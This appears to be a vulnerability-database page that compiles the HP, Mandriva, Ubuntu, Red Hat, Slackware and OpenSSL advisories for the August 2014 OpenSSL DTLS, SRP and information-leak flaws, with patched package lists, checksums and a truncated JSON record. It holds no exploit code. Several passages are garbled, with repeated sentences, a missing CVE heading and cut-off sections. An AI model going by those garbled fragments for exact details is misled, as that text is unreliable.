Release Date: 2014-08-14 Last Updated: 2014-08-14
Potential Security Impact: Remote Denial of Service (DoS), unauthorized access.
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP-UX running OpenSSL. These vulnerabilities could be exploited remotely to create a Denial of Service (DoS), allow unauthorized access. HP-UX B.11.11, B.11.23, B.11.31 running OpenSSL versions before 0.9.8zb
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2014-3505 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3506 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3507 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-3508 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2014-3510 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following updates to resolve these vulnerabilities. The updates are available from https://h20392.www2.hp.com/portal/swdepot/displayP roductInfo.do?productNumber=OPENSSL11I
HP-UX Release HP-UX OpenSSL version
B.11.11 (11i v1) OpenSSL_A.00.09.08zb.001_HP-UX_B.11.11_32_64.depot
B.11.23 (11i v2) OpenSSL_A.00.09.08zb.002_HP-UX_B.11.23_IA-PA.depot
B.11.31 (11i v3) OpenSSL_A.00.09.08zb.003_HP-UX_B.11.31_IA-PA.depot
MANUAL ACTIONS: Yes - Update
Install OpenSSL A.00.09.08zb or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.11
openssl.OPENSSL-CER openssl.OPENSSL-CONF openssl.OPENSSL-DOC openssl.OPENSSL-INC openssl.OPENSSL-LIB openssl.OPENSSL-MAN openssl.OPENSSL-MIS openssl.OPENSSL-PRNG openssl.OPENSSL-PVT openssl.OPENSSL-RUN openssl.OPENSSL-SRC action: install revision A.00.09.08zb.001 or subsequent
HP-UX B.11.23
openssl.OPENSSL-CER openssl.OPENSSL-CONF openssl.OPENSSL-DOC openssl.OPENSSL-INC openssl.OPENSSL-LIB openssl.OPENSSL-MAN openssl.OPENSSL-MIS openssl.OPENSSL-PRNG openssl.OPENSSL-PVT openssl.OPENSSL-RUN openssl.OPENSSL-SRC action: install revision A.00.09.08zb.002 or subsequent
HP-UX B.11.31
openssl.OPENSSL-CER openssl.OPENSSL-CONF openssl.OPENSSL-DOC openssl.OPENSSL-INC openssl.OPENSSL-LIB openssl.OPENSSL-MAN openssl.OPENSSL-MIS openssl.OPENSSL-PRNG openssl.OPENSSL-PVT openssl.OPENSSL-RUN openssl.OPENSSL-SRC action: install revision A.00.09.08zb.003 or subsequent
END AFFECTED VERSIONS
HISTORY Version:1 (rev.1) - 15 August 2014 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
The updated packages have been upgraded to the 1.0.0n version where these security flaws has been fixed.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3508 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3509 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3505 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3506 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3507 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3510 http://www.openssl.org/news/secadv_20140806.txt
Updated Packages:
Mandriva Business Server 1/X86_64: 17007f558e739eb863c8507d520ffbc9 mbs1/x86_64/lib64openssl1.0.0-1.0.0n-1.mbs1.x86_64.rpm f810bbe20b2de26cb99d13ddaf0ac2fa mbs1/x86_64/lib64openssl-devel-1.0.0n-1.mbs1.x86_64.rpm 54d87a61ca0440dc5f344931de1ff43e mbs1/x86_64/lib64openssl-engines1.0.0-1.0.0n-1.mbs1.x86_64.rpm 5b1748370e5a855cc31d3eec7673da5e mbs1/x86_64/lib64openssl-static-devel-1.0.0n-1.mbs1.x86_64.rpm 7e19a555629b4a2d3d4533be7786ce5e mbs1/x86_64/openssl-1.0.0n-1.mbs1.x86_64.rpm a9e74f2bab2878f601cfb44620c76dbb mbs1/SRPMS/openssl-1.0.0n-1.mbs1.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
iD8DBQFT5HsDmqjQ0CJFipgRAhA5AJ0ZoDe2+SA7K7xk+NZLedQBVoFVvgCffPW9 5geoq7aMnxbnw5eTuuH+iIs= =CK7e -----END PGP SIGNATURE----- . ============================================================================ Ubuntu Security Notice USN-2308-1 August 07, 2014
openssl vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in OpenSSL. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. When OpenSSL is used with certain applications, an attacker may use this issue to possibly gain access to sensitive information. (CVE-2014-3508)
Gabor Tyukasz discovered that OpenSSL contained a race condition when processing serverhello messages. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. This issue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-5139)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.04 LTS: libssl1.0.0 1.0.1f-1ubuntu2.5
Ubuntu 12.04 LTS: libssl1.0.0 1.0.1-4ubuntu5.17
Ubuntu 10.04 LTS: libssl0.9.8 0.9.8k-7ubuntu8.20
After a standard system update you need to reboot your computer to make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: openssl security update Advisory ID: RHSA-2014:1053-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1053.html Issue date: 2014-08-13 CVE Names: CVE-2014-0221 CVE-2014-3505 CVE-2014-3506 CVE-2014-3508 CVE-2014-3510 =====================================================================
- Summary:
Updated openssl packages that fix multiple security issues are now available for Red Hat Enterprise Linux 5.
Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux (v. 5 server) - i386, ia64, ppc, s390x, x86_64 Red Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64 Red Hat Enterprise Linux Desktop Workstation (v. 5 client) - i386, x86_64
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL), Transport Layer Security (TLS), and Datagram Transport Layer Security (DTLS) protocols, as well as a full-strength, general purpose cryptography library.
It was discovered that the OBJ_obj2txt() function could fail to properly NUL-terminate its output. This could possibly cause an application using OpenSSL functions to format fields of X.509 certificates to disclose portions of its memory. (CVE-2014-3508)
Multiple flaws were discovered in the way OpenSSL handled DTLS packets. (CVE-2014-0221, CVE-2014-3505, CVE-2014-3506)
A NULL pointer dereference flaw was found in the way OpenSSL performed a handshake when using the anonymous Diffie-Hellman (DH) key exchange. (CVE-2014-3510)
Red Hat would like to thank the OpenSSL project for reporting CVE-2014-0221. Upstream acknowledges Imre Rad of Search-Lab as the original reporter of this issue.
All OpenSSL users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. For the update to take effect, all services linked to the OpenSSL library (such as httpd and other SSL-enabled services) must be restarted or the system rebooted.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1103593 - CVE-2014-0221 openssl: DoS when sending invalid DTLS handshake 1127490 - CVE-2014-3508 openssl: information leak in pretty printing functions 1127499 - CVE-2014-3505 openssl: DTLS packet processing double free 1127500 - CVE-2014-3506 openssl: DTLS memory exhaustion 1127503 - CVE-2014-3510 openssl: DTLS anonymous (EC)DH denial of service
- Package List:
Red Hat Enterprise Linux Desktop (v. 5 client):
Source: openssl-0.9.8e-27.el5_10.4.src.rpm
i386: openssl-0.9.8e-27.el5_10.4.i386.rpm openssl-0.9.8e-27.el5_10.4.i686.rpm openssl-debuginfo-0.9.8e-27.el5_10.4.i386.rpm openssl-debuginfo-0.9.8e-27.el5_10.4.i686.rpm openssl-perl-0.9.8e-27.el5_10.4.i386.rpm
x86_64: openssl-0.9.8e-27.el5_10.4.i686.rpm openssl-0.9.8e-27.el5_10.4.x86_64.rpm openssl-debuginfo-0.9.8e-27.el5_10.4.i686.rpm openssl-debuginfo-0.9.8e-27.el5_10.4.x86_64.rpm openssl-perl-0.9.8e-27.el5_10.4.x86_64.rpm
Red Hat Enterprise Linux Desktop Workstation (v. 5 client):
Source: openssl-0.9.8e-27.el5_10.4.src.rpm
i386: openssl-debuginfo-0.9.8e-27.el5_10.4.i386.rpm openssl-devel-0.9.8e-27.el5_10.4.i386.rpm
x86_64: openssl-debuginfo-0.9.8e-27.el5_10.4.i386.rpm openssl-debuginfo-0.9.8e-27.el5_10.4.x86_64.rpm openssl-devel-0.9.8e-27.el5_10.4.i386.rpm openssl-devel-0.9.8e-27.el5_10.4.x86_64.rpm
Red Hat Enterprise Linux (v. 5 server):
Source: openssl-0.9.8e-27.el5_10.4.src.rpm
i386: openssl-0.9.8e-27.el5_10.4.i386.rpm openssl-0.9.8e-27.el5_10.4.i686.rpm openssl-debuginfo-0.9.8e-27.el5_10.4.i386.rpm openssl-debuginfo-0.9.8e-27.el5_10.4.i686.rpm openssl-devel-0.9.8e-27.el5_10.4.i386.rpm openssl-perl-0.9.8e-27.el5_10.4.i386.rpm
ia64: openssl-0.9.8e-27.el5_10.4.i686.rpm openssl-0.9.8e-27.el5_10.4.ia64.rpm openssl-debuginfo-0.9.8e-27.el5_10.4.i686.rpm openssl-debuginfo-0.9.8e-27.el5_10.4.ia64.rpm openssl-devel-0.9.8e-27.el5_10.4.ia64.rpm openssl-perl-0.9.8e-27.el5_10.4.ia64.rpm
ppc: openssl-0.9.8e-27.el5_10.4.ppc.rpm openssl-0.9.8e-27.el5_10.4.ppc64.rpm openssl-debuginfo-0.9.8e-27.el5_10.4.ppc.rpm openssl-debuginfo-0.9.8e-27.el5_10.4.ppc64.rpm openssl-devel-0.9.8e-27.el5_10.4.ppc.rpm openssl-devel-0.9.8e-27.el5_10.4.ppc64.rpm openssl-perl-0.9.8e-27.el5_10.4.ppc.rpm
s390x: openssl-0.9.8e-27.el5_10.4.s390.rpm openssl-0.9.8e-27.el5_10.4.s390x.rpm openssl-debuginfo-0.9.8e-27.el5_10.4.s390.rpm openssl-debuginfo-0.9.8e-27.el5_10.4.s390x.rpm openssl-devel-0.9.8e-27.el5_10.4.s390.rpm openssl-devel-0.9.8e-27.el5_10.4.s390x.rpm openssl-perl-0.9.8e-27.el5_10.4.s390x.rpm
x86_64: openssl-0.9.8e-27.el5_10.4.i686.rpm openssl-0.9.8e-27.el5_10.4.x86_64.rpm openssl-debuginfo-0.9.8e-27.el5_10.4.i386.rpm openssl-debuginfo-0.9.8e-27.el5_10.4.i686.rpm openssl-debuginfo-0.9.8e-27.el5_10.4.x86_64.rpm openssl-devel-0.9.8e-27.el5_10.4.i386.rpm openssl-devel-0.9.8e-27.el5_10.4.x86_64.rpm openssl-perl-0.9.8e-27.el5_10.4.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
https://www.redhat.com/security/data/cve/CVE-2014-0221.html https://www.redhat.com/security/data/cve/CVE-2014-3505.html https://www.redhat.com/security/data/cve/CVE-2014-3506.html https://www.redhat.com/security/data/cve/CVE-2014-3508.html https://www.redhat.com/security/data/cve/CVE-2014-3510.html https://access.redhat.com/security/updates/classification/#moderate https://www.openssl.org/news/secadv_20140605.txt https://www.openssl.org/news/secadv_20140806.txt
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFT69sGXlSAg2UNWIIRAuZjAJ9R5VuNKxbsx8+T/WGZrkH1VheAqgCdHHXN vrHSSMIJuncazkJWPE/LOyQ= =/f7Y -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Description:
Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat Native library. Solution:
The References section of this erratum contains a download link (you must log in to download the update).
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/openssl-1.0.1i-i486-1_slack14.1.txz: Upgraded. ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated packages for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8zb-i486-1_slack13.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.0.txz
Updated packages for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.0.txz
Updated packages for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-0.9.8zb-i486-1_slack13.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.1.txz
Updated packages for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.1.txz
Updated packages for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-0.9.8zb-i486-1_slack13.37.txz ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.37.txz
Updated packages for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.37.txz ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.37.txz
Updated packages for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1i-i486-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1i-i486-1_slack14.0.txz
Updated packages for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1i-x86_64-1_slack14.0.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1i-x86_64-1_slack14.0.txz
Updated packages for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1i-i486-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1i-i486-1_slack14.1.txz
Updated packages for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1i-x86_64-1_slack14.1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1i-x86_64-1_slack14.1.txz
Updated packages for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.1i-i486-1.txz ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.1i-i486-1.txz
Updated packages for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.1i-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.1i-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 13.0 packages: 30bdc015b10d8891b90d3f6ea34f5fdd openssl-0.9.8zb-i486-1_slack13.0.txz 3dc4140c22c04c94e5e74386a5a1c200 openssl-solibs-0.9.8zb-i486-1_slack13.0.txz
Slackware x86_64 13.0 packages: 3da32f51273762d67bf9dbcc91af9413 openssl-0.9.8zb-x86_64-1_slack13.0.txz 075e5d12e5b909ecac923cb210f83544 openssl-solibs-0.9.8zb-x86_64-1_slack13.0.txz
Slackware 13.1 packages: 3b7e2bb2b317bf72b8f9b2b7a14bddfb openssl-0.9.8zb-i486-1_slack13.1.txz 92af0784eade0674332a56bfab73b97d openssl-solibs-0.9.8zb-i486-1_slack13.1.txz
Slackware x86_64 13.1 packages: df5f961109d7b50971660ca6a7d4c48c openssl-0.9.8zb-x86_64-1_slack13.1.txz 582aaeae3d56730a2e1538a67d4e44da openssl-solibs-0.9.8zb-x86_64-1_slack13.1.txz
Slackware 13.37 packages: 546445d56d3b367fa0dd4e80859c4620 openssl-0.9.8zb-i486-1_slack13.37.txz b80e9df8cdd0649939ec2fab20d24691 openssl-solibs-0.9.8zb-i486-1_slack13.37.txz
Slackware x86_64 13.37 packages: 9c9ce97dc21340924a3e27c1a8047023 openssl-0.9.8zb-x86_64-1_slack13.37.txz 0fe1931f2fc82fb8d5fbe72680caf843 openssl-solibs-0.9.8zb-x86_64-1_slack13.37.txz
Slackware 14.0 packages: d1580f4b22b99cee42b22276653c8180 openssl-1.0.1i-i486-1_slack14.0.txz ec93cec2bcab8ae7391a504573cbc231 openssl-solibs-1.0.1i-i486-1_slack14.0.txz
Slackware x86_64 14.0 packages: 329475de3759225b1d02aa7317b2eb58 openssl-1.0.1i-x86_64-1_slack14.0.txz 25f2a198022d974534986a3913ca705c openssl-solibs-1.0.1i-x86_64-1_slack14.0.txz
Slackware 14.1 packages: 8336457bc31d44ebf502ffc4443f12f7 openssl-1.0.1i-i486-1_slack14.1.txz 4b99ac357fbd3065c53367eea246b8c7 openssl-solibs-1.0.1i-i486-1_slack14.1.txz
Slackware x86_64 14.1 packages: f2b8f81d9d7dc02e5d1011f663ccc95d openssl-1.0.1i-x86_64-1_slack14.1.txz 4360abffbb57cb18ba0720f782d78250 openssl-solibs-1.0.1i-x86_64-1_slack14.1.txz
Slackware -current packages: 49ecd332a899cf742d3467a6efe44269 a/openssl-solibs-1.0.1i-i486-1.txz 27da017c49045981b1793f105aff365f n/openssl-1.0.1i-i486-1.txz
Slackware x86_64 -current packages: 8d74f3d770802182137c84d925f58cbc a/openssl-solibs-1.0.1i-x86_64-1.txz fd9d94d3210f0aedf74959cb0887e2b8 n/openssl-1.0.1i-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the packages as root:
upgradepkg openssl-1.0.1i-i486-1_slack14.1.txz openssl-solibs-1.0.1i-i486-1_slack14.1.txz
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address. OpenSSL Security Advisory [6 Aug 2014] ========================================
Information leak in pretty printing functions (CVE-2014-3508)
A flaw in OBJ_obj2txt may cause pretty printing functions such as X509_name_oneline, X509_name_print_ex et al. to leak some information from the stack. Applications may be affected if they echo pretty printing output to the attacker. OpenSSL SSL/TLS clients and servers themselves are not affected.
Thanks to Ivan Fratric (Google) for discovering this issue. This issue was reported to OpenSSL on 19th June 2014.
The fix was developed by Emilia Käsper and Stephen Henson of the OpenSSL development team.
Crash with SRP ciphersuite in Server Hello message (CVE-2014-5139)
The issue affects OpenSSL clients and allows a malicious server to crash the client with a null pointer dereference (read) by specifying an SRP ciphersuite even though it was not properly negotiated with the client. This can be exploited through a Denial of Service attack.
OpenSSL 1.0.1 SSL/TLS client users should upgrade to 1.0.1i.
Thanks to Joonas Kuorilehto and Riku Hietamäki (Codenomicon) for discovering and researching this issue. This issue was reported to OpenSSL on 2nd July 2014.
The fix was developed by Stephen Henson of the OpenSSL core team.
Race condition in ssl_parse_serverhello_tlsext (CVE-2014-3509)
If a multithreaded client connects to a malicious server using a resumed session and the server sends an ec point format extension it could write up to 255 bytes to freed memory.
OpenSSL 1.0.0 SSL/TLS client users should upgrade to 1.0.0n. OpenSSL 1.0.1 SSL/TLS client users should upgrade to 1.0.1i.
Thanks to Gabor Tyukasz (LogMeIn Inc) for discovering and researching this issue. This issue was reported to OpenSSL on 8th July 2014.
The fix was developed by Gabor Tyukasz.
Double Free when processing DTLS packets (CVE-2014-3505)
An attacker can force an error condition which causes openssl to crash whilst processing DTLS packets due to memory being freed twice. This can be exploited through a Denial of Service attack.
Thanks to Adam Langley and Wan-Teh Chang (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 6th June 2014.
The fix was developed by Adam Langley. This can be exploited through a Denial of Service attack.
Thanks to Adam Langley (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 6th June 2014.
The fix was developed by Adam Langley.
DTLS memory leak from zero-length fragments (CVE-2014-3507)
By sending carefully crafted DTLS packets an attacker could cause openssl to leak memory. This can be exploited through a Denial of Service attack.
Thanks to Adam Langley (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 6th June 2014.
The fix was developed by Adam Langley.
OpenSSL DTLS anonymous EC(DH) denial of service (CVE-2014-3510)
OpenSSL DTLS clients enabling anonymous (EC)DH ciphersuites are subject to a denial of service attack. A malicious server can crash the client with a null pointer dereference (read) by specifying an anonymous (EC)DH ciphersuite and sending carefully crafted handshake messages.
OpenSSL 0.9.8 DTLS client users should upgrade to 0.9.8zb OpenSSL 1.0.0 DTLS client users should upgrade to 1.0.0n. OpenSSL 1.0.1 DTLS client users should upgrade to 1.0.1i.
Thanks to Felix Gröbert (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 18th July 2014.
The fix was developed by Emilia Käsper of the OpenSSL development team.
OpenSSL TLS protocol downgrade attack (CVE-2014-3511)
A flaw in the OpenSSL SSL/TLS server code causes the server to negotiate TLS 1.0 instead of higher protocol versions when the ClientHello message is badly fragmented. This allows a man-in-the-middle attacker to force a downgrade to TLS 1.0 even if both the server and the client support a higher protocol version, by modifying the client's TLS records.
OpenSSL 1.0.1 SSL/TLS server users should upgrade to 1.0.1i.
Thanks to David Benjamin and Adam Langley (Google) for discovering and researching this issue. This issue was reported to OpenSSL on 21st July 2014.
The fix was developed by David Benjamin.
SRP buffer overrun (CVE-2014-3512)
A malicious client or server can send invalid SRP parameters and overrun an internal buffer. Only applications which are explicitly set up for SRP use are affected.
Thanks to Sean Devlin and Watson Ladd (Cryptography Services, NCC Group) for discovering this issue. This issue was reported to OpenSSL on 31st July 2014.
The fix was developed by Stephen Henson of the OpenSSL core team.
References
URL for this Security Advisory: https://www.openssl.org/news/secadv_20140806.txt
Note: the online version of the advisory may be updated with additional details over time
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201408-0095", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.0d" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1h" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.0f" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.0e" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.0g" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.0c" }, { "model": "openssl", "scope": "eq", "trust": 1.6, "vendor": "openssl", "version": "1.0.1e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8u" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8v" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8t" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8o" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8s" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8x" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8q" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1a" 